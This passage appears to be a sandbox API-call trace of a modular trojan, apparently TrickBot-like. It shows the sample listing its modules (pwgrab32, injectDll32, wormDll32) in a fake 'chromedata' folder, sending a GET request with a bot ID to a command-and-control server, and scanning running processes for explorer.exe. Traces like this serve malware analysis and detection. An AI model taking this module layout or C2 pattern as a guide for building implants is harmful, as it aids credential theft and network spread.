	[0250.585] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x69f02a80, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x69f02a80, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x69f02a80, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="networkDll32_configs", cAlternateFileName="NETWOR~2")) returned 1
	[0250.585] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6e5ad7a0, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6e5ad7a0, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6e5d3900, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x48b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32", cAlternateFileName="")) returned 1
	[0250.586] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffee8, Size=0x10) returned 0x22fff90
	[0250.586] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21e408
	[0250.586] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6eff1680, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x6eff1680, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x6eff1680, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="psfin32_configs", cAlternateFileName="PSFIN3~1")) returned 1
	[0250.586] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5edac380, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x5edac380, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x5ee1e7a0, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x111360, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32", cAlternateFileName="")) returned 1
	[0250.586] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22fff90, Size=0x10) returned 0x22ffee8
	[0250.586] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d718
	[0250.586] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x60507b60, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x60507b60, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x60507b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pwgrab32_configs", cAlternateFileName="PWGRAB~1")) returned 1
	[0250.586] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x70f7ba00, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x70f7ba00, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x70fa1b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x28e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="shareDll32", cAlternateFileName="SHARED~1")) returned 1
	[0250.586] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x22ffee8, Size=0x20) returned 0x27c40e0
	[0250.586] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d4f0
	[0250.586] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4554a520, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x4554a520, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x46215b60, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x40b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="systeminfo32", cAlternateFileName="SYSTEM~1")) returned 1
	[0250.586] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27c40e0, Size=0x20) returned 0x27c4108
	[0250.586] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21dfb8
	[0250.586] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x76ad4640, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0xcf20, dwReserved0=0x0, dwReserved1=0x0, cFileName="wormDll32", cAlternateFileName="WORMDL~1")) returned 1
	[0250.586] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x27c4108, Size=0x20) returned 0x27c40e0
	[0250.586] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21db68
	[0250.586] FindNextFileW (in: hFindFile=0x22b6b80, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x76ad4640, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0xcf20, dwReserved0=0x0, dwReserved1=0x0, cFileName="wormDll32", cAlternateFileName="WORMDL~1")) returned 0
	[0250.586] GetLastError () returned 0x12
	[0250.586] FindClose (in: hFindFile=0x22b6b80 | out: hFindFile=0x22b6b80) returned 1
	[0250.586] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32") returned="injectDll32"
	[0250.586] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d940
	[0250.586] GetFullPathNameW (in: lpFileName="Data\\injectDll32", nBufferLength=0x105, lpBuffer=0x21d940, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32", lpFilePart=0x0) returned 0x41
	[0250.586] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668
	[0250.586] GetFileTime (in: hFile=0x668, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x599517e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0250.586] CloseHandle (hObject=0x668) returned 1
	[0250.586] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x7cf8c920, dwHighDateTime=0x1d50a6a)) 
	[0250.587] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32") returned="networkDll32"
	[0250.587] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d940
	[0250.587] GetFullPathNameW (in: lpFileName="Data\\networkDll32", nBufferLength=0x105, lpBuffer=0x21d940, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32", lpFilePart=0x0) returned 0x42
	[0250.587] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668
	[0250.587] GetFileTime (in: hFile=0x668, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0250.587] CloseHandle (hObject=0x668) returned 1
	[0250.587] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x7cf8c920, dwHighDateTime=0x1d50a6a)) 
	[0250.587] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32") returned="psfin32"
	[0250.587] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d940
	[0250.587] GetFullPathNameW (in: lpFileName="Data\\psfin32", nBufferLength=0x105, lpBuffer=0x21d940, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32", lpFilePart=0x0) returned 0x3d
	[0250.587] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668
	[0250.587] GetFileTime (in: hFile=0x668, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x6e5d3900, dwHighDateTime=0x1d50a6a)) returned 1
	[0250.587] CloseHandle (hObject=0x668) returned 1
	[0250.587] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x7cf8c920, dwHighDateTime=0x1d50a6a)) 
	[0250.587] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32") returned="pwgrab32"
	[0250.587] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d940
	[0250.587] GetFullPathNameW (in: lpFileName="Data\\pwgrab32", nBufferLength=0x105, lpBuffer=0x21d940, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32", lpFilePart=0x0) returned 0x3e
	[0250.587] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668
	[0250.588] GetFileTime (in: hFile=0x668, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x5ee1e7a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0250.588] CloseHandle (hObject=0x668) returned 1
	[0250.588] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x7cf8c920, dwHighDateTime=0x1d50a6a)) 
	[0250.588] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32") returned="shareDll32"
	[0250.588] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d940
	[0250.588] GetFullPathNameW (in: lpFileName="Data\\shareDll32", nBufferLength=0x105, lpBuffer=0x21d940, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32", lpFilePart=0x0) returned 0x40
	[0250.588] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\sharedll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668
	[0250.588] GetFileTime (in: hFile=0x668, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x70fa1b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0250.588] CloseHandle (hObject=0x668) returned 1
	[0250.588] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x7cf8c920, dwHighDateTime=0x1d50a6a)) 
	[0250.588] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32") returned="systeminfo32"
	[0250.588] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d940
	[0250.588] GetFullPathNameW (in: lpFileName="Data\\systeminfo32", nBufferLength=0x105, lpBuffer=0x21d940, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32", lpFilePart=0x0) returned 0x42
	[0250.588] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\systeminfo32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668
	[0250.589] GetFileTime (in: hFile=0x668, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x46215b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0250.589] CloseHandle (hObject=0x668) returned 1
	[0250.589] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x7cf8c920, dwHighDateTime=0x1d50a6a)) 
	[0250.589] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32") returned="wormDll32"
	[0250.589] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x21d940
	[0250.589] GetFullPathNameW (in: lpFileName="Data\\wormDll32", nBufferLength=0x105, lpBuffer=0x21d940, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32", lpFilePart=0x0) returned 0x3f
	[0250.589] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\wormdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x668
	[0250.589] GetFileTime (in: hFile=0x668, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a)) returned 1
	[0250.589] CloseHandle (hObject=0x668) returned 1
	[0250.589] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x7cf8c920, dwHighDateTime=0x1d50a6a)) 
	[0250.589] WinHttpCloseHandle (hInternet=0x27e7968) returned 1
	[0250.589] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0250.589] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/1/vGXrEZp7Sj3Qh4Oi0NfzFaxJeyI/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e7968
	[0250.590] WinHttpSetOption (hInternet=0x27e7968, dwOption=0x1f, lpBuffer=0x128bf0, dwBufferLength=0x4) returned 1
	[0250.590] WinHttpSendRequest (hRequest=0x27e7968, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0251.325] WinHttpReceiveResponse (hRequest=0x27e7968, lpReserved=0x0) returned 1
	[0251.325] WinHttpQueryHeaders (in: hRequest=0x27e7968, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128be0, lpdwBufferLength=0x128bdc, lpdwIndex=0x0 | out: lpBuffer=0x128be0*, lpdwBufferLength=0x128bdc*=0x4, lpdwIndex=0x0) returned 1
	[0251.325] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x3) returned 1
	[0251.325] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffe70
	[0251.325] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x22ffe70, dwNumberOfBytesToRead=0x3, lpdwNumberOfBytesRead=0x128bdc | out: lpBuffer=0x22ffe70*, lpdwNumberOfBytesRead=0x128bdc*=0x3) returned 1
	[0251.326] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x0) returned 1
	[0251.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22ffe70, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3
	[0251.326] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffde0
	[0251.326] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22ffe70, cbMultiByte=3, lpWideCharStr=0x22ffde0, cchWideChar=3 | out: lpWideCharStr="/1/") returned 3
	[0251.326] StrStrIW (lpFirst="/1/", lpSrch="/") returned="/1/"
	[0251.327] StrStrIW (lpFirst="1/", lpSrch="/") returned="/"
	[0251.327] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff510
	[0251.327] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ff930
	[0251.327] lstrcpynW (in: lpString1=0x22ff930, lpString2="1/", iMaxLength=2 | out: lpString1="1") returned="1"
	[0251.327] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e15d0) returned 1
	[0251.327] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffde0) returned 1
	[0251.327] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ff510) returned 1
	[0251.327] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ffe70) returned 1
	[0251.327] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x700
	[0251.346] Process32FirstW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0251.347] lstrcmpW (lpString1="explorer.exe", lpString2="[System Process]") returned 1
	[0251.347] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0251.348] lstrcmpW (lpString1="explorer.exe", lpString2="System") returned -1
	[0251.348] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0251.349] lstrcmpW (lpString1="explorer.exe", lpString2="smss.exe") returned -1
	[0251.349] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0251.350] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0251.350] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0251.351] lstrcmpW (lpString1="explorer.exe", lpString2="wininit.exe") returned -1
	[0251.351] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0251.352] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0251.352] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0251.353] lstrcmpW (lpString1="explorer.exe", lpString2="winlogon.exe") returned -1
	[0251.353] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0251.354] lstrcmpW (lpString1="explorer.exe", lpString2="services.exe") returned -1
	[0251.354] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0251.355] lstrcmpW (lpString1="explorer.exe", lpString2="lsass.exe") returned -1
	[0251.355] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0251.356] lstrcmpW (lpString1="explorer.exe", lpString2="lsm.exe") returned -1
	[0251.356] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.357] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0251.357] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.358] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0251.358] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.359] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0251.359] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.360] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0251.360] Process32NextW (in: hSnapshot=0x700, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0251.360] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
